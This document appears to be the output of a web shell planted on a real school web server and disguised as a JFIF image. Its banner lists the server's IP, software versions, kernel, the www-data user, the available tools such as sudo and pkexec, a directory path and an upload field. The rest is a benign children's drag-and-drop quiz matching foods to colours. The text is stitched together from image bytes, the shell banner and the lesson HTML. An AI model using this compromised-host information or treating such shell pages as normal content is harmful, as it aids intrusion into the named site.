????JFIF??x?x????'
Server IP : 79.136.114.73 / Your IP : 18.224.2.133 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/appsrv.astacus.se/apps/school/www_old2/Html/LevelC/Category3/ |
Upload File : |
<!DOCTYPE html> <html> <head> <title>Food and their colors.</title> <script type="text/javascript" src="../../../js/allScriptsForLessonsHtml.js"></script> <style type="text/css"> #id_boxForBread, #id_boxForRice, #id_boxForVegetables, #id_boxForDhal { color: red; font-size: 24px; font-family: "Arial Rounded MT Bold"; text-align:center; } #id_spanWhiteRice, #id_spanYellowDhal, #id_spanBrownBread, #id_spanGreenVegetables { color: red; font-size: 24px; font-family: "Arial Rounded MT Bold"; } #id_options { color: blue; font-size: 26px; font-family: "Arial Rounded MT Bold"; padding-left: 10px; } .style_Td { text-align: center; font-size: 36px; font-family: "Arial Rounded MT Bold"; } .style_Questions { padding-left: 10px; text-align: left; font-size: 24px; font-family: "Arial Rounded MT Bold"; font-weight: bold; color: #000; } </style> <script> function page_preLoad() { setPageImages(); shared_setHeaderTable('id_tblHeader', shared_title_page, shared_getSubTitle(Level.C, Category.No3, 5), true, true); shared_setFooterTable('id_tblFooter', true, true, false, true, true); } function page_onLoad() { shared_set_debugInfo(Level.C, Category.No3); shared_set_tblMainiPadBodyWidthHeight('id_tblMainiPadBody', 'id_meta'); } function setPageImages() { var imagePath = '../../../img/LevelC/Category3/LevelCCat3Lesson5/'; shared_setImageSource('id_imgBread', imagePath, 'bread.png'); shared_setImageSource('id_imgRice', imagePath, 'rice.png'); shared_setImageSource('id_imgVegetables', imagePath, 'vegetables.png'); shared_setImageSource('id_imgDhal', imagePath, 'dhal.png'); } function btnHome_click() { shared_btnHomeCategories_click('LevelC'); } function btnPrevious_click() { window.location = "LevelCCat3Lesson4.html"; } function btnNext_click() { window.location = "LevelCCat3Lesson6.html"; } function DragDrop(id_dropBox) { shared_setTextAndBackgroundColorToGreenByTrimmingText(shared_currentDropingId, id_dropBox); isAllInfosMovedShowClapsAnimation(); } function isAllInfosMovedShowClapsAnimation() { var allElementIdsArray = ['id_spanWhiteRice', 'id_spanYellowDhal', 'id_spanBrownBread', 'id_spanGreenVegetables']; shared_is_all_infos_moved_show_claps_animation(allElementIdsArray, 'shared_id_div_claps_image'); } </script> </head> <body onload="page_onLoad()"> <div id="shared_id_div_claps_image"> </div> <table id="id_tblMainiPadBody" border="1" cellspacing="0" cellpadding="0"> <tr height="5%"> <td> <header height="100%"> <div id="id_tblHeader" align="center"></div> </header> </td> </tr> <tr height="*" data-role="page"> <!-- for swiping left and right especially for Android device --> <td> <table width="100%" height="100%" border="0" cellpadding="5" cellspacing="0"> <tr height="100%"> <td> <table width="100%" height="100%" border="1" cellspacing="0" cellpadding="0" style="border:none"> <tr height="5%"> <td class="style_Questions" style="padding-left:10px; color:blue"> <u>Match the following food and their colours.</u> </td> </tr> <tr height="12%"> <td style="border-top: 0px; border-bottom:none"> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="50%"> <td> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="*" id="id_options">Options:</td> <td class="style_Td" width="40%"><span id="id_spanWhiteRice" class="cls_spanWhiteRice" draggable="true" ondragstart="shared_dragStart(event)">White rice</span></td> <td class="style_Td" width="40%"><span id="id_spanYellowDhal" class="cls_spanYellowDhal" draggable="true" ondragstart="shared_dragStart(event)">Yellow dhal</span></td> </tr> </table> </td> </tr> <tr height="*"> <td> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="*"></td> <td class="style_Td" width="40%"><span id="id_spanBrownBread" class="cls_spanBrownBread" draggable="true" ondragstart="shared_dragStart(event)">Brown bread</span></td> <td class="style_Td" width="40%"><span id="id_spanGreenVegetables" class="cls_spanGreenVegetables" draggable="true" ondragstart="shared_dragStart(event)">Green vegetables</span></td> </tr> </table> </td> </tr> </table> </td> </tr> <tr height="*"> <td style="border-top: none; border-right:none; border-left: none"> <table width="100%" height="100%" border="1" cellspacing="0" cellpadding="0" style="border: none"> <tr height="17%"> <td class="style_Td" width="60%" style="border-bottom: none"> <img id="id_imgBread" width="35%" height="70%"> </td> <td id="id_boxForBread" class="cls_boxForBread" width="*" style="border-left: none; border-bottom: none" ondrop="DragDrop('id_boxForBread')" ondragover="shared_allowDrop(event)"><span>______________</span></td> </tr> <tr height="17%"> <td class="style_Td" width="60%" style="border-bottom: none"> <img id="id_imgRice" width="35%" height="70%"> </td> <td id="id_boxForRice" class="cls_boxForRice" width="*" style="border-left: none; border-bottom: none" ondrop="DragDrop('id_boxForRice')" ondragover="shared_allowDrop(event)"><span>______________</span></td> </tr> <tr height="17%"> <td class="style_Td" width="60%" style="border-bottom: none"> <img id="id_imgVegetables" width="35%" height="70%"> </td> <td id="id_boxForVegetables" class="cls_boxForVegetables" width="*" style="border-left: none; border-bottom: none" ondrop="DragDrop('id_boxForVegetables')" ondragover="shared_allowDrop(event)"><span>______________</span></td> </tr> <tr height="17%"> <td class="style_Td" width="60%" style="border-bottom: none"> <img id="id_imgDhal" width="35%" height="70%"> </td> <td id="id_boxForDhal" class="cls_boxForDhal" width="*" style="border-left: none; border-bottom: none" ondrop="DragDrop('id_boxForDhal')" ondragover="shared_allowDrop(event)"><span>______________</span></td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr height="5%"> <td> <footer height="100%"> <div id="id_tblFooter" align="center"></div> </footer> </td> </tr> </table> <script> page_preLoad(); new webkit_draggable('id_spanWhiteRice', {revert : true, scroll : false, onStart : function(){shared_currentDropingId = 'id_spanWhiteRice'}}); new webkit_draggable('id_spanYellowDhal', {revert : true, scroll : false, onStart : function(){shared_currentDropingId = 'id_spanYellowDhal'}}); new webkit_draggable('id_spanBrownBread', {revert : true, scroll : false, onStart : function(){shared_currentDropingId = 'id_spanBrownBread'}}); new webkit_draggable('id_spanGreenVegetables', {revert : true, scroll : false, onStart : function(){shared_currentDropingId = 'id_spanGreenVegetables'}}); webkit_drop.add('id_boxForBread', {accept:["cls_spanBrownBread"], onDrop : function(){DragDrop('id_boxForBread')}}); webkit_drop.add('id_boxForRice', {accept:["cls_spanWhiteRice"], onDrop : function(){DragDrop('id_boxForRice')}}); webkit_drop.add('id_boxForVegetables', {accept:["cls_spanGreenVegetables"], onDrop : function(){DragDrop('id_boxForVegetables')}}); webkit_drop.add('id_boxForDhal', {accept:["cls_spanYellowDhal"], onDrop : function(){DragDrop('id_boxForDhal')}}); </script> </body> </html>